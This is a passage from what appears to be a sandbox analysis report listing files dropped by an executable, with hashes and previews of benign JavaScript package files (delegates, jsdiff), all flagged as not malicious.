              Preview:./**. * Expose `Delegator`.. */..module.exports = Delegator;../**. * Initialize a delegator.. *. * @param {Object} proto. * @param {String} target. * @api public. */..function Delegator(proto, target) {. if (!(this instanceof Delegator)) return new Delegator(proto, target);. this.proto = proto;. this.target = target;. this.methods = [];. this.getters = [];. this.setters = [];. this.fluents = [];.}../**. * Delegate method `name`.. *. * @param {String} name. * @return {Delegator} self. * @api public. */..Delegator.prototype.method = function(name){. var proto = this.proto;. var target = this.target;. this.methods.push(name);.. proto[name] = function(){. return this[target][name].apply(this[target], arguments);. };.. return this;.};../**. * Delegator accessor `name`.. *. * @param {String} name. * @return {Delegator} self. * @api public. */..Delegator.prototype.access = function(name){. return this.getter(name).setter(name);.};../**. * Delegator getter `name`.. *. * @param
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):313
              Entropy (8bit):4.430059775555672
              Encrypted:false
              SSDEEP:
              MD5:FA4A364036777C0CF422BEE58A0C4E2D
              SHA1:F192D34B412F6FDA6A541ACEE81DE9E0D48648BB
              SHA-256:7FE6BA799E1316869F2990CFE8E51BD29A40E1E5F327BABDD38D23E3E23E8D87
              SHA-512:39C6F87EA0236B4FE9529C61E2FDD894F7938A87BEF1EC90D72DD575E7BA913FBF753D0E1F8E9894E84BBAD8A1CF782427920DA583EE048BDD2948CB1C921FB6
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "delegates",. "version": "1.0.0",. "repository": "visionmedia/node-delegates",. "description": "delegate methods and accessors to another property",. "keywords": ["delegate", "delegation"],. "dependencies": {},. "devDependencies": {. "mocha": "*",. "should": "*". },. "license": "MIT".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1784
              Entropy (8bit):4.540007165304918
              Encrypted:false
              SSDEEP:
              MD5:0CFA1DFBB0F689754598336C8AF5B027
              SHA1:F1C8EC4CFEA947C03D8DD7C2CE43E7E878794284
              SHA-256:36D8A2D16E8138FA52AB1FD35348B8591414EDD6EE318DC1871FCB51A932DDA4
              SHA-512:36AA9F156287D7DBF6A63A43F969FD4625E50994161B2928853AC0A06FE1C4BE7687AB506923A8E88EBD63FF9F78073621BCA3BF430835DB191EAEA4476F46F8
              Malicious:false
              Reputation:unknown
              Preview:.var assert = require('assert');.var delegate = require('..');..describe('.method(name)', function(){. it('should delegate methods', function(){. var obj = {};.. obj.request = {. foo: function(bar){. assert(this == obj.request);. return bar;. }. };.. delegate(obj, 'request').method('foo');.. obj.foo('something').should.equal('something');. }).})..describe('.getter(name)', function(){. it('should delegate getters', function(){. var obj = {};.. obj.request = {. get type() {. return 'text/html';. }. }.. delegate(obj, 'request').getter('type');.. obj.type.should.equal('text/html');. }).})..describe('.setter(name)', function(){. it('should delegate setters', function(){. var obj = {};.. obj.request = {. get type() {. return this._type.toUpperCase();. },.. set type(val) {. this._type = val;. }. }.. delegate(obj, 'request').setter('type');.. obj.type = 'hey';. obj.re
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1177
              Entropy (8bit):4.803579636243705
              Encrypted:false
              SSDEEP:
              MD5:A4FC2EBF112B56934DED1682FB741C39
              SHA1:F3AA352BBF7CC98085FC25E4B1574A46B3936D40
              SHA-256:E4BBD62D8510C2DE3C8A211F919AFF98C6DBB2EC42A565C43C2E4E2482B581BD
              SHA-512:81D8D18EDB2CB2C6C869C13CFC4EA9797CE4BE66C748BBD28E9C8F44BE95D6F9636C0D126A82634958E087D56FA37A990B68FD20531F68B8A238375FEB7B6903
              Malicious:false
              Reputation:unknown
              Preview:# How to Contribute..## Pull Requests..We also accept [pull requests][pull-request]!..Generally we like to see pull requests that..- Maintain the existing code style.- Are focused on a single change (i.e. avoid large refactoring or style adjustments in untouched code if not the primary goal of the pull request).- Have [good commit messages](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html).- Have tests.- Don't decrease the current code coverage (see coverage/lcov-report/index.html)..## Building..```.npm install.npm test.```..The `npm test -- dev` implements watching for tests within Node and `karma start` may be used for manual testing in browsers...If you notice any problems, please report them to the GitHub issue tracker at.[http://github.com/kpdecker/jsdiff/issues](http://github.com/kpdecker/jsdiff/issues)...## Releasing..JsDiff utilizes the [release yeoman generator][generator-release] to perform most release tasks...A full release may be completed with the foll
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1572
              Entropy (8bit):5.163669313987055
              Encrypted:false
              SSDEEP:
              MD5:E6F0309F3F9919CD96CC45A4D4859C54
              SHA1:F62E826F0D70E5202B440E337382D1C3FABB05A8
              SHA-256:152F0FB43E953FCF5C56C5BFA4C834BB96B1603E4026319C613DD3E734F305CF
              SHA-512:9589B843C11B417A1A033C0FEEE8616378E8BE8C1A2D0B14A0376E4A36964F9FD775EDE5E20582150E8E6E657BBE4BD9A224ECDFC8709CD0E7104D9CB9527993
              Malicious:false
              Reputation:unknown
              Preview:Software License Agreement (BSD License)..Copyright (c) 2009-2015, Kevin Decker <kpdecker@gmail.com>..All rights reserved...Redistribution and use of this software in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above. copyright notice, this list of conditions and the. following disclaimer...* Redistributions in binary form must reproduce the above. copyright notice, this list of conditions and the. following disclaimer in the documentation and/or other. materials provided with the distribution...* Neither the name of Kevin Decker nor the names of its. contributors may be used to endorse or promote products. derived from this software without specific prior. written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR.IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTAB
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):50124
              Entropy (8bit):4.766163367878591
              Encrypted:false
              SSDEEP:
              MD5:2BB2B76F6520C4738694E3A3667EFC3F
              SHA1:2BF8A078790C32FBEDEE112F6C8E6992BC731B48
              SHA-256:28019BE9ACD685D12CF6BCF152A75007918EAF28D4F5486DDE03E3E7E983B7F7
              SHA-512:439E0A33CA6019569E8B5BFABFFADB89D8729614FCB92BF556BFDE2F5DC6B5B5C4C952D222DECF23A0CDDA01F4FE5301A46C90AC57BA487576E559EFB28770B6
              Malicious:false
              Reputation:unknown
              Preview:/*!.. diff v5.1.0..Software License Agreement (BSD License)..Copyright (c) 2009-2015, Kevin Decker <kpdecker@gmail.com>..All rights reserved...Redistribution and use of this software in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above. copyright notice, this list of conditions and the. following disclaimer...* Redistributions in binary form must reproduce the above. copyright notice, this list of conditions and the. following disclaimer in the documentation and/or other. materials provided with the distribution...* Neither the name of Kevin Decker nor the names of its. contributors may be used to endorse or promote products. derived from this software without specific prior. written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR.IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRA
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (15854)
              Category:dropped
              Size (bytes):17458
              Entropy (8bit):5.436099882787845
              Encrypted:false
              SSDEEP:
              MD5:77C5643B5796954DAF27A63AC6A6FAA6
              SHA1:E58C1A5560C0D3D5F4524C826E3BCB13EFECB4C0
              SHA-256:3A29BD9374B219BD6964550085CDDF6B62FC4073893D3F251C1D61EF1EA56B7F
              SHA-512:BDCA3D440C44BAFE0F43E893432B8A125C2850E72C55DA7E5A053A2E0A3CD804A90DF17BBC8EBA2E55B3F8265CDA531D9F9DAD8E32CEB87BF2F01409169F1AD4
              Malicious:false
              Reputation:unknown
              Preview:/*!.. diff v5.1.0..Software License Agreement (BSD License)..Copyright (c) 2009-2015, Kevin Decker <kpdecker@gmail.com>..All rights reserved...Redistribution and use of this software in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above. copyright notice, this list of conditions and the. following disclaimer...* Redistributions in binary form must reproduce the above. copyright notice, this list of conditions and the. following disclaimer in the documentation and/or other. materials provided with the distribution...* Neither the name of Kevin Decker nor the names of its. contributors may be used to endorse or promote products. derived from this software without specific prior. written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR.IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRA
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (1644)
              Category:dropped
              Size (bytes):2255
              Entropy (8bit):5.887958645913464
              Encrypted:false
              SSDEEP:
              MD5:F35F163180EBE36BB524C527E2BF21BD
              SHA1:901A488C208181B7E65015EE92A06B3F967BEE5D
              SHA-256:5DE2B6E625C4DEEA898057E0FD8E2EA8B704BA97F6986D693775801D12268673
              SHA-512:9FF23A30623635C4F95F000AD9961BFDF79313A209A29D26BC2277546E536D74AF350AAA06100EAACF3A0AE72D3F267B4B0B0B733EEC132AB08D450DDC48E803
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.convertChangesToDMP = convertChangesToDMP;../*istanbul ignore end*/.// See: http://code.google.com/p/google-diff-match-patch/wiki/API.function convertChangesToDMP(changes) {. var ret = [],. change,. operation;.. for (var i = 0; i < changes.length; i++) {. change = changes[i];.. if (change.added) {. operation = 1;. } else if (change.removed) {. operation = -1;. } else {. operation = 0;. }.. ret.push([operation, change.value]);. }.. return ret;.}.//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIi4uLy4uL3NyYy9jb252ZXJ0L2RtcC5qcyJdLCJuYW1lcyI6WyJjb252ZXJ0Q2hhbmdlc1RvRE1QIiwiY2hhbmdlcyIsInJldCIsImNoYW5nZSIsIm9wZXJhdGlvbiIsImkiLCJsZW5ndGgiLCJhZGRlZCIsInJlbW92ZWQiLCJwdXNoIiwidmFsdWUiXSwibWFwcGluZ3MiOiI7Ozs7Ozs7OztBQUFBO0FBQ08sU0FBU0EsbUJBQVQsQ0FBNkJDLE9BQTdCLEVBQXNDO0FBQzNDLE1BQUlDLEdBQU
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (2564)
              Category:dropped
              Size (bytes):3359
              Entropy (8bit):5.843199742894277
              Encrypted:false
              SSDEEP:
              MD5:B61483E1DD88D513123F8581F8209DF8
              SHA1:DE5820F5E5A32469F561077D04D493DD3387808A
              SHA-256:CC5467E24D48AB4BDA8C2253E6A6134F8BA155EF542F596E33D0B11E1CDDE1F1
              SHA-512:DBDBB3607DB83A39B6504E80597D1A4FEB379C06894DFE91D37DF8171F867FA98C5294E353FF29EF76C73C866CC0A70010AA119626CEFA18699DD2C76FD273A6
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.convertChangesToXML = convertChangesToXML;../*istanbul ignore end*/.function convertChangesToXML(changes) {. var ret = [];.. for (var i = 0; i < changes.length; i++) {. var change = changes[i];.. if (change.added) {. ret.push('<ins>');. } else if (change.removed) {. ret.push('<del>');. }.. ret.push(escapeHTML(change.value));.. if (change.added) {. ret.push('</ins>');. } else if (change.removed) {. ret.push('</del>');. }. }.. return ret.join('');.}..function escapeHTML(s) {. var n = s;. n = n.replace(/&/g, '&amp;');. n = n.replace(/</g, '&lt;');. n = n.replace(/>/g, '&gt;');. n = n.replace(/"/g, '&quot;');. return n;.}.//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIi4uLy4uL3NyYy9jb252ZXJ0L3htbC5qcyJdLCJuYW1lcyI6WyJjb252ZXJ0Q2hhbmdlc1RvWE1MIiwiY2hhbmdlcyIsInJldCIsImkiLCJsZW
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (1376)
              Category:dropped
              Size (bytes):2300
              Entropy (8bit):5.846622220374684
              Encrypted:false
              SSDEEP:
              MD5:0883612B628369490FBAAC3D9C4DEE0B
              SHA1:B997C1817D94B0311E13F5EC4A38CC713978EC1F
              SHA-256:9A5E26C81B1C78441F443C350761148E006995FB88A8B750BE20415208F1E91E
              SHA-512:B75F1DFC188DEBACFABDA9523A17ACBED11790748B9BAD01AEDABA367E9FAE4E65616A03B09B7C8C4F10060974EC14492C0522D236BD2D9389539E85A1961BC2
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.diffArrays = diffArrays;.exports.arrayDiff = void 0;../*istanbul ignore end*/.var./*istanbul ignore start*/._base = _interopRequireDefault(require("./base"))./*istanbul ignore end*/.;../*istanbul ignore start*/ function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }../*istanbul ignore end*/.var arrayDiff = new./*istanbul ignore start*/._base./*istanbul ignore end*/.[./*istanbul ignore start*/."default"./*istanbul ignore end*/.]();../*istanbul ignore start*/.exports.arrayDiff = arrayDiff;../*istanbul ignore end*/.arrayDiff.tokenize = function (value) {. return value.slice();.};..arrayDiff.join = arrayDiff.removeEmpty = function (value) {. return value;.};..function diffArrays(oldArr, newArr, callback) {. return arrayDiff.diff(oldArr, newArr, callback);.}.//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uI
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (22480)
              Category:dropped
              Size (bytes):31393
              Entropy (8bit):5.778421540541695
              Encrypted:false
              SSDEEP:
              MD5:A78B643BA4DCD7EA2666B36E47695DD2
              SHA1:01E377299619F7F95DFE0CEED64DB4A3BEF2ED23
              SHA-256:9C3EACDA8C3924C702439D9E4B77036AF14D4190FFC7E32956095668C6DA167D
              SHA-512:58F3C5CCF84CA0AA746AB0DC05CBDAD1DCB52A3FBB3BB12C1FDCC2DADD0FBA9AF95BF8A9FB62EBF71A490EE153CBF36F0D9677113B34D6043503F3E333B6A4BD
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports["default"] = Diff;../*istanbul ignore end*/.function Diff() {}..Diff.prototype = {. /*istanbul ignore start*/.. /*istanbul ignore end*/. diff: function diff(oldString, newString) {. /*istanbul ignore start*/. var. /*istanbul ignore end*/. options = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : {};. var callback = options.callback;.. if (typeof options === 'function') {. callback = options;. options = {};. }.. this.options = options;. var self = this;.. function done(value) {. if (callback) {. setTimeout(function () {. callback(undefined, value);. }, 0);. return true;. } else {. return value;. }. } // Allow subclasses to massage the input prior to running... oldString = this.castInput(oldString);. newString = this.castInput(newString);. oldString =
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (880)
              Category:dropped
              Size (bytes):1671
              Entropy (8bit):5.815896021126029
              Encrypted:false
              SSDEEP:
              MD5:F0B3144985372874E229E6AD4B94B722
              SHA1:B00BFD7D9C367FF0ADF8A44B116254850EF50177
              SHA-256:E8C614F9A59CC80AB1E95483DCC38B0C2689CC6E02C65705BB9C3092F496B998
              SHA-512:C09113CD58441FE9911FBF91D263E82BD83CE37CEBE16DA0F0A079B4C8ABC6EF40E87EE82F479A6590FF8D829D86778B24A257E1DBE54B28451BF0104EBD9AA2
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.diffChars = diffChars;.exports.characterDiff = void 0;../*istanbul ignore end*/.var./*istanbul ignore start*/._base = _interopRequireDefault(require("./base"))./*istanbul ignore end*/.;../*istanbul ignore start*/ function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }../*istanbul ignore end*/.var characterDiff = new./*istanbul ignore start*/._base./*istanbul ignore end*/.[./*istanbul ignore start*/."default"./*istanbul ignore end*/.]();../*istanbul ignore start*/.exports.characterDiff = characterDiff;../*istanbul ignore end*/.function diffChars(oldStr, newStr, options) {. return characterDiff.diff(oldStr, newStr, options);.}.//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIi4uLy4uL3NyYy9kaWZmL2NoYXJhY3Rlci5qcyJdLCJuYW1lcyI6WyJjaGFyYWN0ZXJEaWZmIiwiRGlmZiIsImRpZmZDaGFycyIsIm9sZFN0ciIsIm
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (1128)
              Category:dropped
              Size (bytes):1966
              Entropy (8bit):5.880998342860331
              Encrypted:false
              SSDEEP:
              MD5:1F216019E498CA9B4F9ED93921D1ED9F
              SHA1:0702FD97A472D2B13AC58E72A9666C0B81290BD1
              SHA-256:8728AA9ADE9830178CD1ED127C5DFE4949808525E21091A571812FA142F68730
              SHA-512:2D39127ECCCE5D1D679BA2209FD1E058680F7ED4BE604110AB2793EFAC18C3DE0B988BE2A8F1F8324B34FA4FDE818F7C21CDA5896C7A4689E3F9D619BA60B1B6
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.diffCss = diffCss;.exports.cssDiff = void 0;../*istanbul ignore end*/.var./*istanbul ignore start*/._base = _interopRequireDefault(require("./base"))./*istanbul ignore end*/.;../*istanbul ignore start*/ function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }../*istanbul ignore end*/.var cssDiff = new./*istanbul ignore start*/._base./*istanbul ignore end*/.[./*istanbul ignore start*/."default"./*istanbul ignore end*/.]();../*istanbul ignore start*/.exports.cssDiff = cssDiff;../*istanbul ignore end*/.cssDiff.tokenize = function (value) {. return value.split(/([{}:;,]|\s+)/);.};..function diffCss(oldStr, newStr, callback) {. return cssDiff.diff(oldStr, newStr, callback);.}.//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIi4uLy4uL3NyYy9kaWZmL2Nzcy5qcyJdLCJuYW1lcyI6WyJjc3NEaWZmIiwiRGlmZiI
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (8576)
              Category:dropped
              Size (bytes):12937
              Entropy (8bit):5.8697453154833585
              Encrypted:false
              SSDEEP:
              MD5:D1912366D93A2738EDE81F421184E895
              SHA1:11D7332AA70D9912BE06BFF6B00588DD84E86DEC
              SHA-256:E9EF76B36E5A19263D199AC35871A15AA2B33C00479192B71F6C8F46B91A1661
              SHA-512:088F2FAE1403E30BF521ABF31067FC940E3C6A138F951E8EEDB2465CEB0E5A478EC2B3F2BBB636413D4EF2E0CE6BAEDEED08BEB692A324729F4C1094C653C932
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.diffJson = diffJson;.exports.canoniuserze = canoniuserze;.exports.jsonDiff = void 0;../*istanbul ignore end*/.var./*istanbul ignore start*/._base = _interopRequireDefault(require("./base"))./*istanbul ignore end*/.;..var./*istanbul ignore start*/._line = require("./line")./*istanbul ignore end*/.;../*istanbul ignore start*/ function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }..function _typeof(obj) { "@babel/helpers - typeof"; if (typeof Symbol === "function" && typeof Symbol.iterator === "symbol") { _typeof = function _typeof(obj) { return typeof obj; }; } else { _typeof = function _typeof(obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; }; } return _typeof(obj); }../*istanbul ignore end*/.var objectPrototypeToString = Object.prototype.toString;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (3728)
              Category:dropped
              Size (bytes):5686
              Entropy (8bit):5.822339519822697
              Encrypted:false
              SSDEEP:
              MD5:1691AEC76D6BBA5A65C7CC970380F8FA
              SHA1:3D8655E21B82593CB231F2880B173120CF3258CE
              SHA-256:4A59B38AF9EE131F7BAAAD55C5EF077DF276736BCD125A0A9C1E824EF7FBBA66
              SHA-512:F4155B45E350EA4C9A2DC1ECECD29E3E83E54A9D664D13CE666262F74953EC6BDAB76A137F0363D43FC332065D81A2D0D7B03F38FD1F0CA91805EB58ACBCFC16
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.diffLines = diffLines;.exports.diffTrimmedLines = diffTrimmedLines;.exports.lineDiff = void 0;../*istanbul ignore end*/.var./*istanbul ignore start*/._base = _interopRequireDefault(require("./base"))./*istanbul ignore end*/.;..var./*istanbul ignore start*/._params = require("../util/params")./*istanbul ignore end*/.;../*istanbul ignore start*/ function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }../*istanbul ignore end*/.var lineDiff = new./*istanbul ignore start*/._base./*istanbul ignore end*/.[./*istanbul ignore start*/."default"./*istanbul ignore end*/.]();../*istanbul ignore start*/.exports.lineDiff = lineDiff;../*istanbul ignore end*/.lineDiff.tokenize = function (value) {. var retLines = [],. linesAndNewlines = value.split(/(\n|\r\n)/); // Ignore the final empty token that occurs if the string ends with a new line.. i
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (1196)
              Category:dropped
              Size (bytes):2090
              Entropy (8bit):5.859499138993491
              Encrypted:false
              SSDEEP:
              MD5:DF66601D6285B436EFD58D1FF05C94FF
              SHA1:8CFF35456539A08B12B262650A96210E018E481E
              SHA-256:A9F98D614ECB77755CB2C949239598BC597E7AF29D5CDB534CAF5662FD193036
              SHA-512:940905FBEA44B12F5AB6F595AC32B3AA1F6AF582DCAC9617256E3D3DB3EFB1CBEF11332ED6985DC6AF07739F06C99D168AECAD805BCA739759356677030F5625
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.diffSentences = diffSentences;.exports.sentenceDiff = void 0;../*istanbul ignore end*/.var./*istanbul ignore start*/._base = _interopRequireDefault(require("./base"))./*istanbul ignore end*/.;../*istanbul ignore start*/ function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }../*istanbul ignore end*/.var sentenceDiff = new./*istanbul ignore start*/._base./*istanbul ignore end*/.[./*istanbul ignore start*/."default"./*istanbul ignore end*/.]();../*istanbul ignore start*/.exports.sentenceDiff = sentenceDiff;../*istanbul ignore end*/.sentenceDiff.tokenize = function (value) {. return value.split(/(\S.+?[.!?])(?=\s+|$)/);.};..function diffSentences(oldStr, newStr, callback) {. return sentenceDiff.diff(oldStr, newStr, callback);.}.//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIi4uLy4uL3N
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text, with very long lines (5824)
              Category:dropped
              Size (bytes):8807
              Entropy (8bit):5.943349203776067
              Encrypted:false
              SSDEEP:
              MD5:066411B2F3821C32265813852458D6A7
              SHA1:EB7EFB705DA05D119A7BEB310103876A89281809
              SHA-256:56F8BFC3BD504657133F8172FA63FC4EF48EC3234B2143F393211E797ECF2D66
              SHA-512:019B3E04A0ABFAFE234628E21C00AD2449B0A3D12FFCB82D870DA12690FD25F5C5A6E953D5FEDFE5BF5A69F9B097BCC2B52AB4E17CEB11BAA6FA8972D7D9FCC6
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.diffWords = diffWords;.exports.diffWordsWithSpace = diffWordsWithSpace;.exports.wordDiff = void 0;../*istanbul ignore end*/.var./*istanbul ignore start*/._base = _interopRequireDefault(require("./base"))./*istanbul ignore end*/.;..var./*istanbul ignore start*/._params = require("../util/params")./*istanbul ignore end*/.;../*istanbul ignore start*/ function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }../*istanbul ignore end*/.// Based on https://en.wikipedia.org/wiki/Latin_script_in_Unicode.//.// Ranges and exceptions:.// Latin-1 Supplement, 0080.00FF.// - U+00D7 . Multiplication sign.// - U+00F7 . Division sign.// Latin Extended-A, 0100.017F.// Latin Extended-B, 0180.024F.// IPA Extensions, 0250.02AF.// Spacing Modifier Letters, 02B0.02FF.// - U+02C7 . &#711; Caron.// - U+02D8 . &#728; Breve.// - U+02D9 .
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):45150
              Entropy (8bit):4.849661738669639
              Encrypted:false
              SSDEEP:
              MD5:B0189FC844758EA7861A33D4CF3DEAA2
              SHA1:42B196484A16DB7A66EEB56906ED26E2182799FB
              SHA-256:69694883A1EE6EF36C17144E2EB41E5D75B8C0F487CAE980FD536BCAB5960931
              SHA-512:46558E8DFABDBF10C92CC41358526B4D779A5E256303032CFBFAAA966D0283881FDD97380D494066EFB210172EB5A6544D5906A29972DB2FEB9A79C5F972B6ED
              Malicious:false
              Reputation:unknown
              Preview:function Diff() {}.Diff.prototype = {. diff: function diff(oldString, newString) {. var options = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : {};. var callback = options.callback;.. if (typeof options === 'function') {. callback = options;. options = {};. }.. this.options = options;. var self = this;.. function done(value) {. if (callback) {. setTimeout(function () {. callback(undefined, value);. }, 0);. return true;. } else {. return value;. }. } // Allow subclasses to massage the input prior to running... oldString = this.castInput(oldString);. newString = this.castInput(newString);. oldString = this.removeEmpty(this.tokenize(oldString));. newString = this.removeEmpty(this.tokenize(newString));. var newLen = newString.length,. oldLen = oldString.length;. var editLength = 1;. var maxEditLength = newLen + oldLen;.. if (options.maxEditLength) {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (3012)
              Category:dropped
              Size (bytes):7236
              Entropy (8bit):5.751206114123984
              Encrypted:false
              SSDEEP:
              MD5:45209E07E41D77271F63ADFBCD59D917
              SHA1:C3F3385BDF0F411B888BB8700C5097503D4DE2D2
              SHA-256:B2EA7D13F91893E2D8B47D86E6F9011F7F8A9721956BB4CDA31AAE20F4C69BB2
              SHA-512:67DED2D0D037D32162A70A02CFDFAC58FCE7EC4F2E226C09B85F195A6B0DE9D44E5D657BEFB0E8C471796D3E1DBA73FA412D607A0FFB9B5606696282AB33717E
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.Object.defineProperty(exports, "Diff", {. enumerable: true,. get: function get() {. return _base["default"];. }.});.Object.defineProperty(exports, "diffChars", {. enumerable: true,. get: function get() {. return _character.diffChars;. }.});.Object.defineProperty(exports, "diffWords", {. enumerable: true,. get: function get() {. return _word.diffWords;. }.});.Object.defineProperty(exports, "diffWordsWithSpace", {. enumerable: true,. get: function get() {. return _word.diffWordsWithSpace;. }.});.Object.defineProperty(exports, "diffLines", {. enumerable: true,. get: function get() {. return _line.diffLines;. }.});.Object.defineProperty(exports, "diffTrimmedLines", {. enumerable: true,. get: function get() {. return _line.diffTrimmedLines;. }.});.Object.defineProperty(exports, "diffSentences", {. enumerable: true,. get: function get() {. return
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (14196)
              Category:dropped
              Size (bytes):19926
              Entropy (8bit):5.810089186544549
              Encrypted:false
              SSDEEP:
              MD5:B5F939A05CD6949954FE5838ABDE3391
              SHA1:C72692E5936C2B3B78F7D2740B9654EBBADB3E94
              SHA-256:E5E12DDC9F74C00841C540BC49DFF0A3BC0D36C4C7027449B10E362123EDB49B
              SHA-512:592A48EBF90942921960D13E581490A156141E2271AE96A91408AF7D31D15DDC787E610962DF9DF0FD2A28CE5D6FB7BAFAF982D8367CB5A14FF144881AA37BB9
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.applyPatch = applyPatch;.exports.applyPatches = applyPatches;../*istanbul ignore end*/.var./*istanbul ignore start*/._parse = require("./parse")./*istanbul ignore end*/.;..var./*istanbul ignore start*/._distanceIterator = _interopRequireDefault(require("../util/distance-iterator"))./*istanbul ignore end*/.;../*istanbul ignore start*/ function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }../*istanbul ignore end*/.function applyPatch(source, uniDiff) {. /*istanbul ignore start*/. var. /*istanbul ignore end*/. options = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : {};.. if (typeof uniDiff === 'string') {. uniDiff =. /*istanbul ignore start*/. (0,. /*istanbul ignore end*/.. /*istanbul ignore start*/. _parse. /*istanbul ignore end*/. .. /*istanbul ignore start*/. parsePatch).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (15320)
              Category:dropped
              Size (bytes):23586
              Entropy (8bit):5.795913518451438
              Encrypted:false
              SSDEEP:
              MD5:C112ABB6141851DA513B24A69881C147
              SHA1:AA626B2D4439C41FFD06B1AE1D725C20554017C0
              SHA-256:CBFD20BD38B97F4B9DD44AEB8B5730BAF90A15F9281BA9CA6C23766A665BA647
